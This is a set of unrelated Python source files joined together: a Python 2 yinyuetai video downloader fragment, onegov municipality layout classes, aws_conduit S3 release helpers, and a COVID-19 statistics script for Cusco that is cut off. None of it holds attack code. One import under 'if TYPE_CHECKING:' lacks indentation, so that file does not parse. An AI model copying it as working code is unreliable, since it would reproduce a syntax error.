        'User-Agent':'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
    }
    try:
        req = urllib2.Request(url, None, headers)
        res = urllib2.urlopen(req)
        html = res.read()
        # Match CDN URLs up to (but not including) the '&br' bitrate parameter.
        reg = r"http://\w*?\.yinyuetai\.com/uploads/videos/common/.*?(?=&br)"
        pattern=re.compile(reg)
        findList = re.findall(pattern,html)
        if len(findList) >= 3:
            return findList[2]
        else:
            return findList[0]
    except:
        # NOTE(review): this bare except also swallows the IndexError raised
        # when no URL matches at all.
        print u"读取视频列表失败!"
def download(id,name):
    """Download the flv for video *id* into ./flv/<name>.flv with a progress bar."""
    link = getList(id)
    if link:
        name = name + '.flv'
        print u"下载:[%s]" % name
        local = createDir()+'/'+name
        try:
            urllib.urlretrieve(link,local,Schedule)
            print u"------下载完成:[%s]\n" % name
        except:
            print u"下载失败!\n"
        # Leftover "download all" variant, kept for reference:
        #for url in urlList: # download everything
            #name = url.split('/')[-1].split('?')[0]
            #name = getFlvName(id)+'-%d.flv' % i
            #print u"下载:[%s]" % name
            #local = createDir()+'/'+name
            #urllib.urlretrieve(url,local,Schedule)
            #i += 1
            #print u"   下载完成:[%s]" % name
            #print ''
    else:
        print u"没有发现视频!\n"
def getFlvName(id):
    """Scrape the MV title for *id* from its page; return False on failure."""
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
    }
    timeout = 5
    url = 'http://v.yinyuetai.com/video/%d' % id
    request = urllib2.Request(url, None, headers)
    response = urllib2.urlopen(request, None, timeout)
    responseHtml = response.read()
    #print responseHtml
    # The title sits in an <h3 class="fl f18"> element on the video page.
    pattern=re.compile(r"<h3\sclass=\"fl\sf18\">(.+)<\/h3>")
    findList = re.findall(pattern,responseHtml)
    try:
        return findList[0].decode('utf8')
    except:
        # No match (or decode error): signal failure to the caller.
        return False
def start():
    """Interactive loop: prompt for an MV id, download it, then repeat.

    Repeats the id prompt until an integer is entered.  If the title
    cannot be scraped, asks the user to type a name instead.
    """
    while 1:
        id = raw_input('ID:>')
        try:
            id = int(id)
            break
        except:
            # Not a number — prompt again.
            pass
    name = getFlvName(id)  # scrape the MV title
    if name == False:  # scraping failed: ask the user for a name
        print u'获取MV名字失败!输入MV名字'
        name = raw_input(u'name:>')
        # NOTE(review): assumes a GBK console (Windows cmd) — confirm.
        name = name.decode('gbk')
    # Start the download.
    print u"开始下载..."
    download(id,name)
    # Tail "recursion" back into the prompt; a very long session would
    # eventually hit Python's recursion limit.
    start()
# Script entry point: run the interactive download loop.
if __name__ == '__main__':
    start()
from functools import cached_property
from onegov.core.elements import Confirm
from onegov.core.elements import Intercooler
from onegov.core.elements import Link
from onegov.wtfs import _
from onegov.wtfs.layouts.default import DefaultLayout
from onegov.wtfs.security import AddModel
from onegov.wtfs.security import DeleteModel
from onegov.wtfs.security import EditModel
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from onegov.core.elements import Element
class MunicipalitiesLayout(DefaultLayout):
    """Layout for the municipalities collection view."""

    @cached_property
    def title(self) -> str:
        return _("Municipalities")

    @cached_property
    def editbar_links(self) -> list['Element']:
        # Offer import/add actions depending on the user's permissions.
        links: list['Element'] = []
        if self.request.has_permission(self.model, EditModel):
            links.append(Link(
                text=_("Import data"),
                url=self.request.link(self.model, 'import-data'),
                attrs={'class': 'upload-icon'}
            ))
        if self.request.has_permission(self.model, AddModel):
            links.append(Link(
                text=_("Add"),
                url=self.request.link(self.model, name='add'),
                attrs={'class': 'add-icon'}
            ))
        return links

    @cached_property
    def breadcrumbs(self) -> list['Element']:
        crumbs: list['Element'] = [Link(_("Homepage"), self.homepage_url)]
        crumbs.append(Link(self.title, self.municipalities_url))
        return crumbs
class ImportMunicipalityDataLayout(DefaultLayout):
    """Layout for the municipality data import form."""

    @cached_property
    def title(self) -> str:
        return _("Import data")

    @cached_property
    def breadcrumbs(self) -> list['Element']:
        trail: list['Element'] = [
            Link(_("Homepage"), self.homepage_url),
            Link(_("Municipalities"), self.municipalities_url),
        ]
        trail.append(Link(self.title, '#'))
        return trail

    @cached_property
    def cancel_url(self) -> str:
        # Cancelling returns to the municipalities overview.
        return self.municipalities_url

    @cached_property
    def success_url(self) -> str:
        # A successful import leads back to the overview as well.
        return self.municipalities_url
class MunicipalityLayout(DefaultLayout):
    """Layout for a single municipality's detail view."""

    @cached_property
    def title(self) -> str:
        return self.model.name

    @cached_property
    def editbar_links(self) -> list['Element']:
        links: list['Element'] = []
        if self.request.has_permission(self.model, EditModel):
            links.append(Link(
                text=_("Edit"),
                url=self.request.link(self.model, 'edit'),
                attrs={'class': 'edit-icon'}
            ))
            links.append(Link(
                text=_("Delete pick-up dates"),
                url=self.request.link(self.model, 'delete-dates'),
                attrs={'class': 'delete-icon'}
            ))
        if self.request.has_permission(self.model, DeleteModel):
            # Deletion goes through a confirmation dialog and an
            # Intercooler-driven DELETE request.
            confirmation = Confirm(
                _("Do you really want to delete this municipality?"),
                _("This cannot be undone."),
                _("Delete"),
                _("Cancel")
            )
            links.append(Link(
                text=_("Delete"),
                url=self.csrf_protected_url(self.request.link(self.model)),
                attrs={'class': 'delete-icon'},
                traits=(
                    confirmation,
                    Intercooler(
                        request_method='DELETE',
                        redirect_after=self.municipalities_url
                    )
                )
            ))
        return links

    @cached_property
    def breadcrumbs(self) -> list['Element']:
        return [
            Link(_("Homepage"), self.homepage_url),
            Link(_("Municipalities"), self.municipalities_url),
            Link(self.title, '#'),
        ]
class AddMunicipalityLayout(DefaultLayout):
    """Layout for the form adding a new municipality."""

    @cached_property
    def title(self) -> str:
        return _("Add municipality")

    @cached_property
    def breadcrumbs(self) -> list['Element']:
        trail: list['Element'] = [
            Link(_("Homepage"), self.homepage_url),
            Link(_("Municipalities"), self.municipalities_url),
        ]
        trail.append(Link(_("Add"), '#'))
        return trail

    @cached_property
    def cancel_url(self) -> str:
        # Cancelling returns to the municipalities overview.
        return self.municipalities_url

    @cached_property
    def success_url(self) -> str:
        # A successful submission also leads back to the overview.
        return self.municipalities_url
class EditMunicipalityLayout(DefaultLayout):
    """Layout for the form editing an existing municipality."""

    @cached_property
    def title(self) -> str:
        return _("Edit municipality")

    @cached_property
    def breadcrumbs(self) -> list['Element']:
        model_url = self.request.link(self.model)
        return [
            Link(_("Homepage"), self.homepage_url),
            Link(_("Municipalities"), self.municipalities_url),
            Link(self.model.name, model_url),
            Link(_("Edit"), '#'),
        ]

    @cached_property
    def cancel_url(self) -> str:
        # Cancelling goes back to the municipality's detail view.
        return self.request.link(self.model)

    @cached_property
    def success_url(self) -> str:
        # Saving returns to the municipalities overview.
        return self.municipalities_url
class DeleteMunicipalityDatesLayout(DefaultLayout):
    """Layout for the view deleting a municipality's pick-up dates."""

    @cached_property
    def title(self) -> str:
        return _("Delete pick-up dates")

    @cached_property
    def breadcrumbs(self) -> list['Element']:
        return [
            Link(_("Homepage"), self.homepage_url),
            Link(_("Municipalities"), self.municipalities_url),
            Link(self.model.name, self.request.link(self.model)),
            Link(self.title, '#'),
        ]

    @cached_property
    def cancel_url(self) -> str:
        # Both cancel and success return to the municipality itself.
        return self.request.link(self.model)

    @cached_property
    def success_url(self) -> str:
        return self.request.link(self.model)
|
import functools

import boto3
import semver

from aws_conduit import conduit_factory as factory
from aws_conduit.conduit_portfolio import ConduitPortfolio
# Shared AWS clients/session, created once at import time.
SESSION = boto3.session.Session()
IAM = boto3.client('iam')
STS = boto3.client('sts')
# S3 key under which the conduit configuration document is stored.
CONFIG_PREFIX = 'conduit.yaml'
# Placeholder tokens substituted into artifact files at release time ...
RESOURCES_KEY = "__resources__"
BUCKET_KEY = "__bucket__"
PREFIX_KEY = "__prefix__"
# ... and their "escaped" counterparts, swapped in/out around a
# substitution pass so literal placeholders survive it (see
# replace_resources / revert_resources below).
RESOURCES_KEY_OTHER = "__|resources|__"
BUCKET_KEY_OTHER = "__|bucket|__"
PREFIX_KEY_OTHER = "__|prefix|__"
def get_region():
    """Return the name of the region the default boto3 session is bound to."""
    return SESSION.region_name
def get_account_id():
    """Return the AWS account id of the current credentials (via STS)."""
    return STS.get_caller_identity().get('Account')
def get_alias():
    """Return the first known alias of the current AWS account.

    Returns None (implicitly) when the account has no alias configured.
    """
    response = IAM.list_account_aliases()
    if response and response['AccountAliases']:
        return response['AccountAliases'][0]
def get_portfolio(config, name=None, portfolio_id=None):
    """Look up a portfolio in *config* by name or by id.

    Raises ValueError when no portfolio matches.
    """
    for candidate in config['portfolios']:
        matches_name = name is not None and candidate.name == name
        matches_id = (
            portfolio_id is not None
            and candidate.portfolio_id == portfolio_id
        )
        if matches_name or matches_id:
            return candidate
    raise ValueError('Portfolio not found: {} {}'.format(portfolio_id, name))
def get_product(config, name=None, product_id=None):
    """Look up a product across every portfolio by name or by id.

    Raises ValueError when no product matches.
    """
    for folio in config['portfolios']:
        for candidate in folio.products:
            if product_id is not None and candidate.product_id == product_id:
                return candidate
            if name is not None and candidate.name == name:
                return candidate
    raise ValueError('Product not found: {} {}'.format(product_id, name))
# Resolved once at import time; requires valid AWS credentials.
ACCOUNT_ID = get_account_id()
def inject_config(function):
    """Decorator injecting the persisted Conduit configuration.

    Loads the configuration from S3, passes it to the wrapped function
    as the ``config`` keyword argument and writes it back afterwards so
    that any mutations made by the function are persisted.
    """
    @functools.wraps(function)
    def wrapper(*args, **kwargs):
        # Resolve the bucket and load the config on each call.  The
        # original did this at decoration (i.e. module import) time,
        # triggering S3 I/O on import and sharing one increasingly
        # stale config object across every call.
        bucket = factory.start().create_s3()
        configuration = bucket.get_config(CONFIG_PREFIX)
        result = function(*args, **kwargs, config=configuration)
        bucket.put_config(configuration, CONFIG_PREFIX)
        return result
    return wrapper
def find_build_product(spec, config):
    """Locate the portfolio/product pair named by *spec*.

    Entries in ``config['portfolios']`` may be hydrated ConduitPortfolio
    objects or plain dicts; both shapes are handled.  Returns a dict
    with keys ``product`` and ``portfolio`` (None for misses).
    """
    portfolio = None
    product = None
    for entry in config['portfolios']:
        hydrated = isinstance(entry, ConduitPortfolio)
        entry_name = entry.name if hydrated else entry['name']
        if entry_name != spec['portfolio']:
            continue
        portfolio = entry
        candidates = entry.products if hydrated else entry['products']
        for candidate in candidates:
            candidate_name = candidate.name if hydrated else candidate['name']
            if candidate_name == spec['product']:
                product = candidate
                break
    return dict(
        product=product,
        portfolio=portfolio
    )
def get_all_portfolio_artifacts(portfolio_name, config):
    """Collect the template artifacts of every product in a portfolio.

    NOTE(review): for ConduitPortfolio entries this yields
    ``{'template': ..., 'product': ...}`` dicts, but for dict-shaped
    entries the raw product dicts are returned unchanged — the two
    shapes differ; confirm callers handle both.
    """
    artifacts = []
    for entry in config['portfolios']:
        if isinstance(entry, ConduitPortfolio):
            if entry.name == portfolio_name:
                artifacts.extend(
                    dict(template=item.template, product=item.name)
                    for item in entry.products
                )
        elif entry['name'] == portfolio_name:
            artifacts.extend(entry['products'])
    return artifacts
def find_s3_build_product(spec, config):
    """Find the build product for *spec*, creating default entries.

    If the portfolio or product named by *spec* does not yet exist in
    *config*, dict-shaped defaults (version '0.0.0') are created and
    attached to the configuration in place.
    """
    # Removed stray debug `print(spec)` left over from development.
    default_product = dict(
        name=spec['product'],
        currentVersion='0.0.0'
    )
    result = find_build_product(spec, config)
    if result['portfolio'] is None:
        # Neither portfolio nor product exist: register both.
        result['portfolio'] = dict(
            name=spec['portfolio'],
            products=[default_product]
        )
        result['product'] = default_product
        config['portfolios'].append(result['portfolio'])
    elif result['product'] is None:
        # Portfolio exists but lacks the product: add a default entry.
        # NOTE(review): assumes the portfolio is dict-shaped here — a
        # hydrated ConduitPortfolio has no item access; confirm.
        result['product'] = default_product
        result['portfolio']['products'].append(default_product)
    return result
def next_version(release_type, current_version):
    """Return *current_version* bumped according to *release_type*.

    Recognised types: 'build', 'major', 'minor', 'patch'.  Any other
    value leaves the version untouched.
    """
    if release_type == 'build':
        return semver.bump_build(current_version)
    if release_type == 'major':
        return semver.bump_major(current_version)
    if release_type == 'minor':
        return semver.bump_minor(current_version)
    if release_type == 'patch':
        return semver.bump_patch(current_version)
    return current_version
def put_resource(source_path, destination_path, bucket, portfolio, product, version, environment='core'):
    """Upload *source_path* to the release location in *bucket*.

    The S3 key is ``portfolio/product[/environment]/version[/destination_path]``.
    Placeholder tokens in yaml/json sources are substituted before the
    upload and reverted afterwards so the local file is left unchanged.
    Returns the https URL of the uploaded object.

    The original spelt out four near-identical branches; they differed
    only in whether *environment* and *destination_path* contribute a
    path segment, so the paths are now built once.
    """
    segments = [portfolio, product]
    if environment is not None:
        segments.append(environment)
    segments.append(version)
    prefix = "/".join(str(s) for s in segments)
    key = prefix if destination_path is None else "{}/{}".format(prefix, destination_path)
    directory = "{}/{}".format(bucket.name, prefix)
    print("Adding resource to release: {}".format(source_path))
    print("Key is: {}".format(key))
    replace_resources(directory, bucket, prefix, path=source_path)
    bucket.put_resource(source_path, key)
    revert_resources(directory, bucket, prefix, path=source_path)
    # NOTE(review): when destination_path is None the returned URL ends
    # in '/None' — preserved from the original; confirm callers never
    # use the URL in that case.
    return "https://s3-{}.amazonaws.com/{}/{}".format(get_region(), directory, destination_path)
def read_write(function):
    """Decorator feeding *function* the contents of a yaml/yml/json file.

    Expects a ``path`` keyword argument (a string, or a dict with a
    ``source`` key).  The file is read and passed to *function* as the
    ``file_data`` keyword; a non-None return value is written back.
    Files with other extensions (and calls without ``path``) are left
    untouched and *function* is not called.

    Fixes over the original: file handles are closed via ``with`` even
    when *function* raises, and ``functools.wraps`` preserves the
    wrapped function's metadata.
    """
    @functools.wraps(function)
    def wrapper(*args, **kwargs):
        if 'path' not in kwargs:
            return None
        target = kwargs['path']
        if not isinstance(target, str):
            target = target['source']
        if not target.endswith(('yaml', 'yml', 'json')):
            return None
        with open(target, 'r', encoding='utf-8') as handle:
            contents = handle.read()
        updated = function(*args, **kwargs, file_data=contents)
        if updated is not None:
            with open(target, 'w', encoding='utf-8') as handle:
                handle.write(updated)
        return None
    return wrapper
@read_write
def replace_resources(directory, bucket, prefix, path=None, file_data=None):
    """Substitute placeholder tokens in *file_data* with real values.

    Escaped placeholders are demoted to plain ones afterwards so they
    survive exactly one substitution pass (see revert_resources).
    """
    if file_data is None:
        return None
    print("Replacing in {}".format(path))
    # Order matters: real placeholders first, then unescape the
    # protected ones.
    substitutions = (
        (RESOURCES_KEY, directory),
        (BUCKET_KEY, bucket.name),
        (PREFIX_KEY, prefix),
        (RESOURCES_KEY_OTHER, RESOURCES_KEY),
        (BUCKET_KEY_OTHER, BUCKET_KEY),
        (PREFIX_KEY_OTHER, PREFIX_KEY),
    )
    result = file_data
    for old, new in substitutions:
        result = result.replace(old, new)
    return result
@read_write
def revert_resources(directory, bucket, prefix, path=None, file_data=None):
    """Undo the substitutions performed by replace_resources.

    Existing placeholders are first escaped so that re-inserting
    placeholders for the concrete values cannot clobber them.
    """
    if file_data is None:
        return None
    print("Replacing in {}".format(path))
    # Order matters: escape surviving placeholders before mapping the
    # concrete values back to placeholders.
    substitutions = (
        (BUCKET_KEY, BUCKET_KEY_OTHER),
        (PREFIX_KEY, PREFIX_KEY_OTHER),
        (RESOURCES_KEY, RESOURCES_KEY_OTHER),
        (directory, RESOURCES_KEY),
        (bucket.name, BUCKET_KEY),
        (prefix, PREFIX_KEY),
    )
    result = file_data
    for old, new in substitutions:
        result = result.replace(old, new)
    return result
def put_sls_resource(path, bucket, portfolio, product, version, sls_package, environment='core'):
    """Upload one serverless build artifact and return its S3 URL.

    Placeholder and serverless-package references are substituted
    before the upload and reverted afterwards so the local file is
    left unchanged.
    """
    stripped = path
    if '.serverless' in stripped:
        # Store the artifact without its local '.serverless/' prefix.
        stripped = stripped.replace('.serverless/', '')
    directory = "{}/{}/{}/{}".format(portfolio, product, environment, version)
    key = "{}/{}".format(directory, stripped)
    # NOTE(review): 'directory' is passed as the prefix argument here,
    # unlike put_resource which uses a bucket-less prefix — confirm
    # this asymmetry is intended.
    replace_resources(directory, bucket, directory, path=path)
    replace_sls_resources(directory, bucket.name, sls_package, environment, path=path)
    print("Adding sls resource to release: {}".format(path))
    bucket.put_resource(path, key)
    revert_sls_resources(directory, bucket.name, sls_package, environment, path=path)
    return "https://s3-{}.amazonaws.com/{}/{}/{}".format(get_region(), bucket.name, directory, stripped)
@read_write
def replace_sls_resources(key, bucket, sls_package, environment, path=None, file_data=None):
    """Rewrite serverless package references in *file_data* to point at *key*.

    Maps the package's artifact directory and bucket to the release
    location, resolves the '${STAGE}' token and redirects any
    '.serverless' path to *key*.
    """
    if file_data is None:
        return None
    # Cleaned the leftover debug prefix ("333 444 ") from the log line.
    print("Replacing in {}".format(path))
    print("The key is: {}".format(key))
    data = file_data.replace(sls_package['artifactDirectoryName'], key)
    data = data.replace(sls_package['bucket'], bucket)
    data = data.replace('${STAGE}', environment)
    return data.replace('.serverless', key)
@read_write
def revert_sls_resources(key, bucket, sls_package, environment, path=None, file_data=None):
    """Undo the substitutions performed by replace_sls_resources."""
    if file_data is None:
        return None
    print("Reverting in {}".format(path))
    print("The key is: {}".format(key))
    data = file_data.replace(key, sls_package['artifactDirectoryName'])
    data = data.replace(bucket, sls_package['bucket'])
    return data.replace(environment, '${STAGE}')
|
import pandas as pd
import json
import sys
from casos import casos_positivos, casos_fallecidos


def _casos(df, departamento=None, provincia=None, sexo=None,
           edad_min=None, edad_max=None):
    """Count the rows of *df* matching the given filters.

    Each keyword narrows the selection; ``None`` means "no filter".
    Replaces the original ``list(df[...].shape)[0]`` idiom — the row
    count is simply ``df.shape[0]`` — and removes ~200 copy-pasted
    filter expressions.
    """
    sel = df
    if departamento is not None:
        sel = sel[sel['DEPARTAMENTO'] == departamento]
    if provincia is not None:
        sel = sel[sel['PROVINCIA'] == provincia]
    if sexo is not None:
        sel = sel[sel['SEXO'] == sexo]
    if edad_min is not None:
        sel = sel[sel['EDAD_DECLARADA'] >= edad_min]
    if edad_max is not None:
        sel = sel[sel['EDAD_DECLARADA'] <= edad_max]
    return sel.shape[0]


# Age bands ("etapas de vida"): preinfancia 0-5, infancia 6-11,
# adolescencia 12-18, juventud 19-26, adultez 27-59, persona mayor 60+.

#!Departamento Cusco
poblacion_cusco = 1360013
positivos_cusco = _casos(casos_positivos, departamento="CUSCO")
positivos_hombres_cusco = _casos(casos_positivos, departamento="CUSCO", sexo="MASCULINO")
positivos_mujeres_cusco = _casos(casos_positivos, departamento="CUSCO", sexo="FEMENINO")
fallecidos_cusco = _casos(casos_fallecidos, departamento="CUSCO")
fallecidos_hombres_cusco = _casos(casos_fallecidos, departamento="CUSCO", sexo="MASCULINO")
fallecidos_mujeres_cusco = _casos(casos_fallecidos, departamento="CUSCO", sexo="FEMENINO")
#!Departamento Cusco - Etapa de vida
fallecidos_preinfancia_cusco = _casos(casos_fallecidos, departamento="CUSCO", edad_min=0, edad_max=5)
fallecidos_infancia_cusco = _casos(casos_fallecidos, departamento="CUSCO", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco = _casos(casos_fallecidos, departamento="CUSCO", edad_min=12, edad_max=18)
fallecidos_juventud_cusco = _casos(casos_fallecidos, departamento="CUSCO", edad_min=19, edad_max=26)
fallecidos_adultez_cusco = _casos(casos_fallecidos, departamento="CUSCO", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco = _casos(casos_fallecidos, departamento="CUSCO", edad_min=60)

#!Provincias Cusco
#!Cusco-Cusco
poblacion_cusco_cusco = 477462
positivos_cusco_cusco = _casos(casos_positivos, provincia="CUSCO")
positivos_hombres_cusco_cusco = _casos(casos_positivos, provincia="CUSCO", sexo="MASCULINO")
positivos_mujeres_cusco_cusco = _casos(casos_positivos, provincia="CUSCO", sexo="FEMENINO")
fallecidos_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO")
fallecidos_hombres_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO", sexo="MASCULINO")
fallecidos_mujeres_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO", sexo="FEMENINO")
fallecidos_preinfancia_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_cusco = _casos(casos_fallecidos, provincia="CUSCO", edad_min=60)

#!Cusco-Acomayo
poblacion_cusco_acomayo = 26977
positivos_cusco_acomayo = _casos(casos_positivos, provincia="ACOMAYO")
positivos_hombres_cusco_acomayo = _casos(casos_positivos, provincia="ACOMAYO", sexo="MASCULINO")
positivos_mujeres_cusco_acomayo = _casos(casos_positivos, provincia="ACOMAYO", sexo="FEMENINO")
fallecidos_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO")
fallecidos_hombres_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO", sexo="MASCULINO")
fallecidos_mujeres_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO", sexo="FEMENINO")
fallecidos_preinfancia_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_acomayo = _casos(casos_fallecidos, provincia="ACOMAYO", edad_min=60)

#!Cusco-Anta
poblacion_cusco_anta = 58268
positivos_cusco_anta = _casos(casos_positivos, provincia="ANTA")
positivos_hombres_cusco_anta = _casos(casos_positivos, provincia="ANTA", sexo="MASCULINO")
positivos_mujeres_cusco_anta = _casos(casos_positivos, provincia="ANTA", sexo="FEMENINO")
fallecidos_cusco_anta = _casos(casos_fallecidos, provincia="ANTA")
fallecidos_hombres_cusco_anta = _casos(casos_fallecidos, provincia="ANTA", sexo="MASCULINO")
fallecidos_mujeres_cusco_anta = _casos(casos_fallecidos, provincia="ANTA", sexo="FEMENINO")
fallecidos_preinfancia_cusco_anta = _casos(casos_fallecidos, provincia="ANTA", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_anta = _casos(casos_fallecidos, provincia="ANTA", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco_anta = _casos(casos_fallecidos, provincia="ANTA", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_anta = _casos(casos_fallecidos, provincia="ANTA", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_anta = _casos(casos_fallecidos, provincia="ANTA", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_anta = _casos(casos_fallecidos, provincia="ANTA", edad_min=60)

#!Cusco-Calca
poblacion_cusco_calca = 75968
positivos_cusco_calca = _casos(casos_positivos, provincia="CALCA")
positivos_hombres_cusco_calca = _casos(casos_positivos, provincia="CALCA", sexo="MASCULINO")
positivos_mujeres_cusco_calca = _casos(casos_positivos, provincia="CALCA", sexo="FEMENINO")
fallecidos_cusco_calca = _casos(casos_fallecidos, provincia="CALCA")
fallecidos_hombres_cusco_calca = _casos(casos_fallecidos, provincia="CALCA", sexo="MASCULINO")
fallecidos_mujeres_cusco_calca = _casos(casos_fallecidos, provincia="CALCA", sexo="FEMENINO")
fallecidos_preinfancia_cusco_calca = _casos(casos_fallecidos, provincia="CALCA", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_calca = _casos(casos_fallecidos, provincia="CALCA", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco_calca = _casos(casos_fallecidos, provincia="CALCA", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_calca = _casos(casos_fallecidos, provincia="CALCA", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_calca = _casos(casos_fallecidos, provincia="CALCA", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_calca = _casos(casos_fallecidos, provincia="CALCA", edad_min=60)

#!Cusco-Canas
poblacion_cusco_canas = 38696
positivos_cusco_canas = _casos(casos_positivos, provincia="CANAS")
positivos_hombres_cusco_canas = _casos(casos_positivos, provincia="CANAS", sexo="MASCULINO")
positivos_mujeres_cusco_canas = _casos(casos_positivos, provincia="CANAS", sexo="FEMENINO")
fallecidos_cusco_canas = _casos(casos_fallecidos, provincia="CANAS")
fallecidos_hombres_cusco_canas = _casos(casos_fallecidos, provincia="CANAS", sexo="MASCULINO")
fallecidos_mujeres_cusco_canas = _casos(casos_fallecidos, provincia="CANAS", sexo="FEMENINO")
fallecidos_preinfancia_cusco_canas = _casos(casos_fallecidos, provincia="CANAS", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_canas = _casos(casos_fallecidos, provincia="CANAS", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco_canas = _casos(casos_fallecidos, provincia="CANAS", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_canas = _casos(casos_fallecidos, provincia="CANAS", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_canas = _casos(casos_fallecidos, provincia="CANAS", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_canas = _casos(casos_fallecidos, provincia="CANAS", edad_min=60)

#!Cusco-Canchis
poblacion_cusco_canchis = 104056
positivos_cusco_canchis = _casos(casos_positivos, provincia="CANCHIS")
positivos_hombres_cusco_canchis = _casos(casos_positivos, provincia="CANCHIS", sexo="MASCULINO")
positivos_mujeres_cusco_canchis = _casos(casos_positivos, provincia="CANCHIS", sexo="FEMENINO")
fallecidos_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS")
fallecidos_hombres_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS", sexo="MASCULINO")
fallecidos_mujeres_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS", sexo="FEMENINO")
fallecidos_preinfancia_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_canchis = _casos(casos_fallecidos, provincia="CANCHIS", edad_min=60)

#!Cusco-Chumbivilcas
poblacion_cusco_chumbivilcas = 81415
positivos_cusco_chumbivilcas = _casos(casos_positivos, provincia="CHUMBIVILCAS")
positivos_hombres_cusco_chumbivilcas = _casos(casos_positivos, provincia="CHUMBIVILCAS", sexo="MASCULINO")
positivos_mujeres_cusco_chumbivilcas = _casos(casos_positivos, provincia="CHUMBIVILCAS", sexo="FEMENINO")
fallecidos_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS")
fallecidos_hombres_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS", sexo="MASCULINO")
fallecidos_mujeres_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS", sexo="FEMENINO")
fallecidos_preinfancia_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_chumbivilcas = _casos(casos_fallecidos, provincia="CHUMBIVILCAS", edad_min=60)

#!Cusco-Espinar
poblacion_cusco_espinar = 70132
positivos_cusco_espinar = _casos(casos_positivos, provincia="ESPINAR")
positivos_hombres_cusco_espinar = _casos(casos_positivos, provincia="ESPINAR", sexo="MASCULINO")
positivos_mujeres_cusco_espinar = _casos(casos_positivos, provincia="ESPINAR", sexo="FEMENINO")
fallecidos_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR")
fallecidos_hombres_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR", sexo="MASCULINO")
fallecidos_mujeres_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR", sexo="FEMENINO")
fallecidos_preinfancia_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR", edad_min=6, edad_max=11)
